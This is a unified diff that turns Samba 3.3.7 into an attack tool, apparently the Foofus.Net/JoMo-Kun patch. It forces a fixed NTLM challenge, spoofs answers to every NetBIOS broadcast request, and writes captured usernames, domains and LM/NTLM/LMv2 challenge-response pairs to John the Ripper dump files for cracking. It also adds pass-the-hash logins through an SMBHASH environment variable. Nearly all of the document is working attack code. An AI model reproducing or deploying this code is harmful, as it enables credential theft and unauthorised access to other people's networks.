diff -rub samba-3.3.7/source/auth/auth.c samba-3.3.7-jmk/source/auth/auth.c
--- samba-3.3.7/source/auth/auth.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/auth/auth.c	2009-09-02 16:30:31.572438368 -0500
@@ -82,6 +82,8 @@
 	const char *challenge_set_by = NULL;
 	auth_methods *auth_method;
 	TALLOC_CTX *mem_ctx;
+  char addr[INET6_ADDRSTRLEN];
+
 
 	if (auth_context->challenge.length) {
 		DEBUG(5, ("get_ntlm_challenge (auth subsystem): returning previous challenge by module %s (normal)\n", 
@@ -123,14 +125,20 @@
 	}
 	
 	if (!challenge_set_by) {
-		uchar chal[8];
+		uchar chal[8] = { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88 };
+		int i;
 		
 		generate_random_buffer(chal, sizeof(chal));
 		auth_context->challenge = data_blob_talloc(auth_context->mem_ctx, 
 							   chal, sizeof(chal));
 		
-		challenge_set_by = "random";
-		auth_context->challenge_may_be_modified = True;
+		challenge_set_by = "jmk";
+		auth_context->challenge_may_be_modified = False;
+		DEBUG(0, ("*** Fixed LM/NTLM Challenge Samba Attack -- Foofus.Net/JoMo-Kun ***\n")); 
+		DEBUGADD(0, ("[%s] Set server challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+		for (i=0; i<auth_context->challenge.length; i++)
+			DEBUGADD(0, ("%2.2X", 0xFF & (int)auth_context->challenge.data[i]));
+		DEBUGADD(0, ("\n"));
 	} 
 	
 	DEBUG(5, ("auth_context challenge created by %s\n", challenge_set_by));
diff -rub samba-3.3.7/source/libsmb/smbencrypt.c samba-3.3.7-jmk/source/libsmb/smbencrypt.c
--- samba-3.3.7/source/libsmb/smbencrypt.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/libsmb/smbencrypt.c	2009-09-02 15:40:57.652349670 -0500
@@ -41,6 +41,9 @@
 #endif
 }
 
+#define SMB_HASH_LM 1
+#define SMB_HASH_NTLM 2
+
 /*
    This implements the X/Open SMB password encryption
    It takes a password ('unix' string), a 8 byte "crypt key" 
@@ -59,6 +62,64 @@
 	return ret;
 }
 
+/*
+   Support for using LM/NTLM hashes -- jmk@foofus.net 10/2006 
+   Greets: Foofus, Phenfen, Omi, Fizzgig, pMonkey
+*/
+void E_set_hash(int type, uchar hash[16])
+{
+	uint l;
+	char p[1024];
+	int i, j;
+	char HexChar;
+	int HexValue;
+
+	if ( (getenv("SMBHASH")) && (strlen(getenv("SMBHASH")) == 65) )
+	{
+    memset(p, 0, 1024);
+		strncpy(p, getenv("SMBHASH"), 1024);
+
+    /* Replace "NO PASSWORD*********************" */
+    if ((type == SMB_HASH_LM) && (strncmp(p, "N", 1) == 0))
+      strncpy(p, "AAD3B435B51404EEAAD3B435B51404EE", 32);
+    else if ((type == SMB_HASH_NTLM) && (strncmp(p+33, "N", 1) == 0))
+      strncpy(p+33, "31D6CFE0D16AE931B73C59D7E0C089C0", 32);
+    
+		for (i=0; i<16; i++) {
+			HexValue = 0x0;
+			for (j=0; j<2; j++) {
+				if (type == SMB_HASH_LM)
+					HexChar = (char)p[2*i+j];
+				else
+					HexChar = (char)p[2*i+j+33];
+
+				if (HexChar > 0x39)
+					HexChar = HexChar | 0x20;  /* convert upper case to lower */
+
+				if (!(((HexChar >= 0x30) && (HexChar <= 0x39))||   /* 0 - 9 */
+					 ((HexChar >= 0x61) && (HexChar <= 0x66)))) {    /* a - f */
+					fprintf(stderr, "Error invalid char (%c) for hash.\n", HexChar);
+					exit(1);
+				}
+
+				HexChar -= 0x30;
+				if (HexChar > 0x09)  /* HexChar is "a" - "f" */
+					HexChar -= 0x27;
+
+				HexValue = (HexValue << 4) | (char)HexChar;
+			}
+			hash[i] = (uchar)HexValue;
+		}
+	}
+	else
+	{
+		fprintf(stderr, "Error reading SMB HASH.\n");
+		fprintf(stderr, "\tEx: export SMBHASH=\"_LM_HASH_:_NTLM_HASH_\"\n");
+		exit(1);
+	}
+}
+/* jmk */
+
 /**
  * Creates the MD4 Hash of the users password in NT UNICODE.
  * @param passwd password in 'unix' charset.
@@ -70,6 +131,11 @@
 	int len;
 	smb_ucs2_t wpwd[129];
 	
+	/* Support for using NTLM hashes -- jmk@foofus.net 10/2006 */
+	if ( getenv("SMBHASH") ) {
+		fprintf(stderr, "HASH PASS: Substituting user supplied NTLM HASH...\n");
+		E_set_hash(SMB_HASH_NTLM, p16);
+	} else { 
 	/* Password must be converted to NT unicode - null terminated. */
 	push_ucs2(NULL, wpwd, (const char *)passwd, 256, STR_UNICODE|STR_NOALIGN|STR_TERMINATE);
 	/* Calculate length in bytes */
@@ -77,6 +143,7 @@
 
 	mdfour(p16, (unsigned char *)wpwd, len);
 	ZERO_STRUCT(wpwd);	
+	}
 }
 
 /**
@@ -113,6 +180,11 @@
 	fstring dospwd; 
 	ZERO_STRUCT(dospwd);
 	
+	/* Support for using LM hashes -- jmk@foofus.net 10/2006 */
+	if ( getenv("SMBHASH") ) {
+		fprintf(stderr, "HASH PASS: Substituting user supplied LM HASH...\n");
+		E_set_hash(SMB_HASH_LM, p16);
+	} else {
 	/* Password must be converted to DOS charset - null terminated, uppercase. */
 	push_ascii(dospwd, passwd, sizeof(dospwd), STR_UPPER|STR_TERMINATE);
        
@@ -124,6 +196,7 @@
 	}
 
 	ZERO_STRUCT(dospwd);	
+	}
 
 	return ret;
 }
diff -rub samba-3.3.7/source/nmbd/nmbd.c samba-3.3.7-jmk/source/nmbd/nmbd.c
--- samba-3.3.7/source/nmbd/nmbd.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/nmbd/nmbd.c	2009-09-02 16:03:27.624795325 -0500
@@ -849,6 +849,9 @@
 
 	DEBUG(0,("nmbd version %s started.\n", SAMBA_VERSION_STRING));
 	DEBUGADD(0,("%s\n", COPYRIGHT_STARTUP_MESSAGE));
+	DEBUGADD(0, ("\n----------------------------------------------------------\n"));
+	DEBUGADD(0, ("*** NMB Broadcast Auto-Response -- Foofus.Net/JoMo-Kun ***\n"));
+	DEBUGADD(0, ("----------------------------------------------------------\n\n"));
 
 	if (!lp_load_initial_only(get_dyn_CONFIGFILE())) {
 		DEBUG(0, ("error opening config file\n"));
diff -rub samba-3.3.7/source/nmbd/nmbd_incomingrequests.c samba-3.3.7-jmk/source/nmbd/nmbd_incomingrequests.c
--- samba-3.3.7/source/nmbd/nmbd_incomingrequests.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/nmbd/nmbd_incomingrequests.c	2009-09-02 16:05:50.398286430 -0500
@@ -448,18 +448,44 @@
 	struct name_record *namerec = NULL;
 	int reply_data_len = 0;
 	int i;
+	int num_ips;
 	
 	DEBUG(3,("process_name_query_request: Name query from %s on subnet %s for name %s\n", 
 		 inet_ntoa(p->ip), subrec->subnet_name, nmb_namestr(question)));
   
+	/* ********************************************************************************* */
+	/* 
+		 Hack to make nmbd respond with our IP for all NMB broadcasts.
+		 Based on ideas from Karma (http://www.theta44.org/karma/). 
+		 JoMo-Kun <jmk@foofus.net> [02/2007]
+	*/
+ 
 	/* Look up the name in the cache - if the request is a broadcast request that
 	   came from a subnet we don't know about then search all the broadcast subnets
 	   for a match (as we don't know what interface the request came in on). */
 
+	/*
 	if(subrec == remote_broadcast_subnet)
 		namerec = find_name_for_remote_broadcast_subnet( question, FIND_ANY_NAME);
 	else
 		namerec = find_name_on_subnet(subrec, question, FIND_ANY_NAME);
+	*/
+
+	/* Create Response Packet */
+	DEBUGADD(0, ("[%s] NetBIOS Broadcast Request: %s\n", inet_ntoa(p->ip), question->name) );
+	namerec = SMB_MALLOC_P(struct name_record);
+	memset( (char *)namerec, '\0', sizeof(*namerec) );
+	namerec->subnet = subrec;
+	make_nmb_name(&namerec->name, question->name, 0x00);
+	namerec->data.nb_flags = NB_ACTIVE;
+	namerec->data.wins_flags = WINS_ACTIVE;
+	namerec->data.nb_flags = NB_PERM;
+	namerec->data.source = SELF_NAME;
+	num_ips = iface_count(); 
+	namerec->data.num_ips = num_ips;
+	namerec->data.ip = SMB_MALLOC_ARRAY( struct in_addr, num_ips );
+	memcpy( (namerec->data.ip), &subrec->myip, num_ips * sizeof(struct in_addr) );
+	/* ********************************************************************************* */
 
 	/* Check if it is a name that expired */
 	if (namerec && 
diff -rub samba-3.3.7/source/smbd/negprot.c samba-3.3.7-jmk/source/smbd/negprot.c
--- samba-3.3.7/source/smbd/negprot.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/negprot.c	2009-09-02 16:21:04.870333222 -0500
@@ -255,6 +255,7 @@
 	bool negotiate_spnego = False;
 	time_t t = time(NULL);
 	ssize_t ret;
+  char addr[INET6_ADDRSTRLEN];
 
 	global_encrypted_passwords_negotiated = lp_encrypted_passwords();
 
@@ -371,6 +372,7 @@
 			return;
 		}
 		DEBUG(3,("not using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Disabled.\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 	} else {
 		DATA_BLOB spnego_blob = negprot_spnego();
 
@@ -390,6 +392,7 @@
 
 		SCVAL(req->outbuf,smb_vwv16+1, 0);
 		DEBUG(3,("using SPNEGO\n"));
+		DEBUGADD(0,("[%s] Simple and Protected GSSAPI Negotiation Mechanism (SPNEG) Enabled (NTLMv2).\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 	}
 	
 	SSVAL(req->outbuf,smb_vwv17, p - q); /* length of challenge+domain
@@ -517,6 +520,7 @@
 	char **cliprotos;
 	int i;
 	size_t converted_size;
+  char addr[INET6_ADDRSTRLEN];
 
 	static bool done_negprot = False;
 
@@ -672,8 +676,9 @@
 		reload_services(True);          
 		supported_protocols[protocol].proto_reply_fn(req, choice);
 		DEBUG(3,("Selected protocol %s\n",supported_protocols[protocol].proto_name));
+		DEBUGADD(0,("[%s] Selected protocol: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), supported_protocols[protocol].proto_name));
 	} else {
-		DEBUG(0,("No protocol supported !\n"));
+		DEBUG(0,("[%s] No protocol supported !\n", client_addr(get_client_fd(), addr, sizeof(addr))));
 		reply_outbuf(req, 1, 0);
 		SSVAL(req->outbuf, smb_vwv0, choice);
 	}
diff -rub samba-3.3.7/source/smbd/reply.c samba-3.3.7-jmk/source/smbd/reply.c
--- samba-3.3.7/source/smbd/reply.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/reply.c	2009-09-02 16:22:32.040811318 -0500
@@ -456,6 +456,7 @@
 	int msg_flags = CVAL(inbuf,1);
 	fstring name1,name2;
 	char name_type = 0;
+  char addr[INET6_ADDRSTRLEN];
 
 	/*
 	 * We only really use 4 bytes of the outbuf, but for the smb_setlen
@@ -491,6 +492,9 @@
 		DEBUG(2,("netbios connect: name1=%s name2=%s\n",
 			 name1,name2));      
 
+		DEBUGADD(0, ("[%s] Server NetBIOS Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), name1));
+		DEBUGADD(0, ("[%s] Client NetBIOS Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), name2));
+
 		set_local_machine_name(name1, True);
 		set_remote_machine_name(name2, True);
 
@@ -634,6 +638,7 @@
 	char *path = NULL;
 	char *p, *q;
 	uint16 tcon_flags;
+  char addr[INET6_ADDRSTRLEN];
 
 	START_PROFILE(SMBtconX);
 
@@ -717,6 +722,7 @@
 		return;
 	}
 
+	DEBUGADD(0, ("[%s] Device Type: %s Share: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), client_devicetype, service));
 	DEBUG(4,("Client requested device type [%s] for share [%s]\n", client_devicetype, service));
 
 	conn = make_connection(service, password, client_devicetype,
diff -rub samba-3.3.7/source/smbd/sesssetup.c samba-3.3.7-jmk/source/smbd/sesssetup.c
--- samba-3.3.7/source/smbd/sesssetup.c	2009-07-28 03:30:39.000000000 -0500
+++ samba-3.3.7-jmk/source/smbd/sesssetup.c	2009-09-03 11:10:17.879146925 -0500
@@ -1474,7 +1474,13 @@
 		char *p = smb_buf(req->inbuf);
 		char *save_p = smb_buf(req->inbuf);
 		uint16 byte_count;
-
+		int i;	
+		int chars_to_copy = 0;	
+		char *pathname;
+		char *filename;
+		char *tempname;
+		FILE *fp;
+    char addr[INET6_ADDRSTRLEN];
 
 		if(global_client_caps == 0) {
 			global_client_caps = IVAL(req->inbuf,smb_vwv11);
@@ -1543,6 +1549,48 @@
 		if (doencrypt) {
 			lm_resp = data_blob(p, passlen1);
 			nt_resp = data_blob(p+passlen1, passlen2);
+
+			if (passlen2 > 24) /* LMv2 */
+			{
+				DEBUGADD(0, ("[%s] LM Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<16; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+	 
+				DEBUGADD(0, ("\n[%s] LM Client Challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=16; i<passlen1; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+	 
+				DEBUGADD(0, ("\n"));
+			}
+			else /* LM */ 
+			{
+				DEBUGADD(0, ("[%s] LM Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<passlen1; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[i]));
+			
+				DEBUGADD(0, ("\n"));
+			}
+
+			if (passlen2 > 24)	/* NTLMv2 */ 
+			{
+				DEBUGADD(0, ("[%s] NT Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<16; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+	 
+				DEBUGADD(0, ("\n[%s] NT Client Challenge: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=16; i<passlen2; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+
+			 DEBUGADD(0, ("\n"));
+			}
+			else /* NTLM */
+			{
+				DEBUGADD(0, ("[%s] NT Client Response: ", client_addr(get_client_fd(), addr, sizeof(addr))));
+				for (i=0; i<passlen2; i++)
+					DEBUGADD(0, ("%2.2X", 0xFF & (int)p[passlen1 +i]));
+				
+				DEBUGADD(0, ("\n"));
+			}
 		} else if (lp_security() != SEC_SHARE) {
 			/*
 			 * In share level we should ignore any passwords, so
@@ -1602,9 +1650,130 @@
 					     primary_domain, p,
 					     sizeof(primary_domain),
 					     STR_TERMINATE);
-		} else {
+		} else
 			fstrcpy( primary_domain, "null" );
+
+		DEBUGADD(0, ("[%s] Client Name: %s Remote Machine Name: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), client_name(get_client_fd()), get_remote_machine_name()));
+		DEBUGADD(0, ("[%s] User: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), user));
+		DEBUGADD(0, ("[%s] Domain: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), domain));
+		DEBUGADD(0, ("[%s] Primary Domain: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), primary_domain));
+		DEBUGADD(0, ("[%s] Native OS: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), native_os));
+		DEBUGADD(0, ("[%s] Native LanMan: %s\n", client_addr(get_client_fd(), addr, sizeof(addr)), native_lanman));
+
+		/* Log LM/NTLM/LMv2 Challenge/Response in John Format */
+		if ( doencrypt ) {
+			DEBUGADD(0,("\n*** Logging LM/NTLM/LMv2 Challenge/Response Exchanges to File (John/jtr Format) ***\n"));
+
+			/* Set Logging Path */
+			if ( strlen(lp_logfile()) != 0 )
+			{
+				filename = lp_logfile();
+				tempname = strrchr(filename, '/');
+				pathname = malloc(tempname - filename + 1);
+				memset(pathname, 0, tempname - filename + 1);
+				strncpy(pathname, filename, tempname - filename);
+			}
+			else
+			{
+				pathname = malloc(5);
+				memset(pathname, 0, 5);
+				snprintf(pathname, 4, "/tmp");
+			}
+
+			/* Set Log File Name */
+			if ((lm_resp.length == 24) && (nt_resp.length != 24))
+			{
+				filename = malloc(strlen(pathname) + 13 + 1);
+				memset(filename, 0, strlen(pathname) + 13 + 1);
+				snprintf(filename, strlen(pathname) + 13 + 1, "%s/dump.NETLMv2", pathname);
+			}
+			else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+			{
+				filename = malloc(strlen(pathname) + 11 + 1);
+				memset(filename, 0, strlen(pathname) + 11 + 1);
+				snprintf(filename, strlen(pathname) + 11 + 1, "%s/dump.NETLM", pathname);
 		}
+			else
+			{
+				DEBUGADD(0,("Failed to identify LM/NTLM/LMv2 hashes based on length.\n"));
+				filename = NULL;
+			}
+
+			DEBUGADD(0,("Set LM/NTLM/LMv2 Dump File:%s\n", filename));
+			free(pathname);
+
+			fp = fopen(filename, "a");
+			if (fp == NULL) {
+				DEBUGADD(0, ("Failed to Open Dump File.\n"));
+			}
+			/* Log LMv2 Challenge/Response */
+			/* USER::DOMAIN:1122334455667788:498B5E245BAFA65E56334B28E3F501CF:6FE8BB5B66ED5892 */
+			else if ((lm_resp.length == 24) && (nt_resp.length != 24))
+			{
+				DEBUGADD(0,("Dumping LMv2 Response\n"));
+				
+				/* Client Username */
+				fprintf(fp, "%s::", user);
+
+				/* Client Domain */
+				if (strlen(domain) != 0)
+					fprintf(fp, "%s:", domain);
+				else
+					fprintf(fp, ":");
+		
+				/* Fixed Server Challenge */
+				fprintf(fp, "1122334455667788:");
+
+				/* CLient LMv2 Response */
+				for (i=0; i<16; i++)
+					fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+		
+				fprintf(fp, ":"); 
+
+				/* Client LMv2 Challenge */
+				for (i=16; i<passlen1;i++)
+					fprintf(fp, "%2.2X", (0xFF & (int)lm_resp.data[i]));
+
+				fprintf(fp, "\n");
+
+				fclose(fp);
+			}
+			/* Log LM/NTLM Challenge/Response */
+			/* USER::DOMAIN:1122334455667788:E70F85C227FB0ED25AAE68715B54FA4E:BFC5ACEC40927AEF */
+			else if ((lm_resp.length == 24) && (nt_resp.length == 24))
+			{
+				DEBUGADD(0,("Dumping LM/NTLM Response\n"));
+
+				/* Client Username */
+				fprintf(fp, "%s::", user);
+
+				/* Client Domain */
+				if (strlen(domain) != 0)
+					fprintf(fp, "%s:", domain);
+				else
+					fprintf(fp, ":");
+		
+				/* Client LM Response */
+				for (i=0; i<passlen1; i++)
+					fprintf(fp,"%2.2X", 0xFF & (int)lm_resp.data[i] );
+			 
+				fprintf(fp, ":"); 
+				
+				/* Client NTLM Response */
+				for (i=0; i<passlen1; i++)
+					fprintf(fp,"%2.2X", 0xFF & (int)nt_resp.data[i] );
+				
+				/* Fixed Server Challenge */
+				fprintf(fp, ":1122334455667788\n");
+
+				fclose(fp);
+			}
+			 
+			DEBUGADD(0, ("\n*** Completed Dumping Challenge/Response ***\n"));
+		}
+		else
+			DEBUGADD(0, ("\n*** Memory Allocation Failure! ***\n"));
+		/* response dumping code ends */
 
 		DEBUG(3,("Domain=[%s]  NativeOS=[%s] NativeLanMan=[%s] "
 			"PrimaryDomain=[%s]\n",